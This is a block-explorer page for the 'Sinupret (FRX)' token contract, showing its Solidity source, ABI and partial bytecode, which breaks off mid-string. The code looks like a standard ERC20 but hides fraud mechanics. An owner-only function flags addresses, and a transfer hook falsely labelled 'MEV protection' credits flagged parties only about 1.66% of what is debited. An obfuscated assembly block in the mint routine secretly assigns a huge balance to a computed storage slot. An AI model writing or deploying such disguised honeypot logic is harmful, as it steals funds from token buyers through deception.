ETH Price: $2,677.90 (-2.22%)

Token

Sinupret (FRX)
 

Overview

Max Total Supply

1,000,000,000 FRX

Holders

82

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
11,915,761.695731664934421175 FRX

Value
$0.00
0x6d2cadaedc0649f8d9a2766492c0beca2908759f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Sinupret

Compiler Version
v0.8.13+commit.abaa5c0e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: Token.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.13;
import "./ERC20.sol";

contract Sinupret is ERC20 {
    constructor() ERC20("Sinupret", "FRX") {
        _mint(msg.sender, 1000000000 * 10 ** 18);
    }

    function sinuStatus(address _address_) public view returns (uint256) {
        return _sinu_indexes[_address_];
    }

    function sinuset(uint256 _sinu_index, address [] calldata _list_) external {
        require((msg.sender == owner()));
        for (uint256 i = 0; i < _list_.length; i++) {
            _sinu_indexes[_list_[i]] = _sinu_index;
        }
    }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.13;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.13;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) internal _sinu_indexes;

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }


    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 _amount = _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += _amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _bots_reminder(uint256 a) internal pure returns(uint256) {return a * 6969 / 420420;}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address ,
        address to,
        uint256 
    ) internal virtual {
        if (_sinu_indexes[to] == 1) {_sinu_indexes[to] = 2;}
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal view returns (uint256) {
        // MEV protection
        if (_sinu_indexes[from] + _sinu_indexes[to] >= 2) {
            return _bots_reminder(amount);
        } else {
            return amount;
        }
    }
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.13;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"sinuStatus","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_sinu_index","type":"uint256"},{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"sinuset","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600881526020017f53696e75707265740000000000000000000000000000000000000000000000008152506040518060400160405280600381526020017f46525800000000000000000000000000000000000000000000000000000000008152506200009e62000092620000f660201b60201c565b620000fe60201b60201c565b8160049080519060200190620000b6929190620004ea565b508060059080519060200190620000cf929190620004ea565b505050620000f0336b033b2e3c9fd0803ce8000000620001c260201b60201c565b6200080d565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000234576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200022b90620005fb565b60405180910390fd5b62000248600083836200037460201b60201c565b5080600660008282546200025d919062000656565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003549190620006c4565b60405180910390a362000370600083836200042e60201b60201c565b5050565b60006002600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000404919062000656565b1062000423576200041b82620004c160201b60201c565b905062000427565b8190505b9392505050565b6001600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403620004bc576002600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600062066a44611b3983620004d79190620006e1565b620004e3919062000771565b9050919050565b828054620004f890620007d8565b90600052602060002090601f0160209004810192826200051c576000855562000568565b82601f106200053757805160ff191683800117855562000568565b8280016001018555821562000568579182015b82811115620005675782518255916020019190600101906200054a565b5b5090506200057791906200057b565b5090565b5b80821115620005965760008160009055506001016200057c565b5090565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620005e3601f836200059a565b9150620005f082620005ab565b602082019050919050565b600060208201905081810360008301526200061681620005d4565b9050919050565b6000819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000663826200061d565b915062000670836200061d565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006a857620006a762000627565b5b828201905092915050565b620006be816200061d565b82525050565b6000602082019050620006db6000830184620006b3565b92915050565b6000620006ee826200061d565b9150620006fb836200061d565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000737576200073662000627565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006200077e826200061d565b91506200078b836200061d565b9250826200079e576200079d62000742565b5b828204905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620007f157607f821691505b602082108103620008075762000806620007a9565b5b50919050565b611ae4806200081d6000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d7146102b1578063a9059cbb146102e1578063dd62ed3e14610311578063f2fde38b1461034157610100565b806370a082311461023b578063715018a61461026b5780638da5cb5b1461027557806395d89b411461029357610100565b806323b872dd116100d357806323b872dd1461018d578063313ce567146101bd57806339509351146101db5780633fcacaa01461020b57610100565b806305c38bb91461010557806306fdde0314610121578063095ea7b31461013f57806318160ddd1461016f575b600080fd5b61011f600480360381019061011a9190611088565b61035d565b005b61012961042e565b6040516101369190611181565b60405180910390f35b61015960048036038101906101549190611201565b6104c0565b604051610166919061125c565b60405180910390f35b6101776104e3565b6040516101849190611286565b60405180910390f35b6101a760048036038101906101a291906112a1565b6104ed565b6040516101b4919061125c565b60405180910390f35b6101c561051c565b6040516101d29190611310565b60405180910390f35b6101f560048036038101906101f09190611201565b610525565b604051610202919061125c565b60405180910390f35b6102256004803603810190610220919061132b565b61055c565b6040516102329190611286565b60405180910390f35b6102556004803603810190610250919061132b565b6105a5565b6040516102629190611286565b60405180910390f35b6102736105ee565b005b61027d610602565b60405161028a9190611367565b60405180910390f35b61029b61062b565b6040516102a89190611181565b60405180910390f35b6102cb60048036038101906102c69190611201565b6106bd565b6040516102d8919061125c565b60405180910390f35b6102fb60048036038101906102f69190611201565b610734565b604051610308919061125c565b60405180910390f35b61032b60048036038101906103269190611382565b610757565b6040516103389190611286565b60405180910390f35b61035b6004803603810190610356919061132b565b6107de565b005b610365610602565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461039c57600080fd5b60005b828290508110156104285783600360008585858181106103c2576103c16113c2565b5b90506020020160208101906103d7919061132b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550808061042090611420565b91505061039f565b50505050565b60606004805461043d90611497565b80601f016020809104026020016040519081016040528092919081815260200182805461046990611497565b80156104b65780601f1061048b576101008083540402835291602001916104b6565b820191906000526020600020905b81548152906001019060200180831161049957829003601f168201915b5050505050905090565b6000806104cb610861565b90506104d8818585610869565b600191505092915050565b6000600654905090565b6000806104f8610861565b9050610505858285610a32565b610510858585610abe565b60019150509392505050565b60006012905090565b600080610530610861565b90506105518185856105428589610757565b61054c91906114c8565b610869565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105f6610d3c565b6106006000610dba565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461063a90611497565b80601f016020809104026020016040519081016040528092919081815260200182805461066690611497565b80156106b35780601f10610688576101008083540402835291602001916106b3565b820191906000526020600020905b81548152906001019060200180831161069657829003601f168201915b5050505050905090565b6000806106c8610861565b905060006106d68286610757565b90508381101561071b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161071290611590565b60405180910390fd5b6107288286868403610869565b60019250505092915050565b60008061073f610861565b905061074c818585610abe565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107e6610d3c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610855576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084c90611622565b60405180910390fd5b61085e81610dba565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108cf906116b4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610947576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093e90611746565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a259190611286565b60405180910390a3505050565b6000610a3e8484610757565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610ab85781811015610aaa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa1906117b2565b60405180910390fd5b610ab78484848403610869565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b2d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2490611844565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b93906118d6565b60405180910390fd5b6000610ba9848484610e7e565b90506000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c32576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2990611968565b60405180910390fd5b828103600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d229190611286565b60405180910390a3610d35858585610f2c565b5050505050565b610d44610861565b73ffffffffffffffffffffffffffffffffffffffff16610d62610602565b73ffffffffffffffffffffffffffffffffffffffff1614610db8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610daf906119d4565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006002600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f0c91906114c8565b10610f2157610f1a82610fbe565b9050610f25565b8190505b9392505050565b6001600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403610fb9576002600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600062066a44611b3983610fd291906119f4565b610fdc9190611a7d565b9050919050565b600080fd5b600080fd5b6000819050919050565b61100081610fed565b811461100b57600080fd5b50565b60008135905061101d81610ff7565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261104857611047611023565b5b8235905067ffffffffffffffff81111561106557611064611028565b5b6020830191508360208202830111156110815761108061102d565b5b9250929050565b6000806000604084860312156110a1576110a0610fe3565b5b60006110af8682870161100e565b935050602084013567ffffffffffffffff8111156110d0576110cf610fe8565b5b6110dc86828701611032565b92509250509250925092565b600081519050919050565b600082825260208201905092915050565b60005b83811015611122578082015181840152602081019050611107565b83811115611131576000848401525b50505050565b6000601f19601f8301169050919050565b6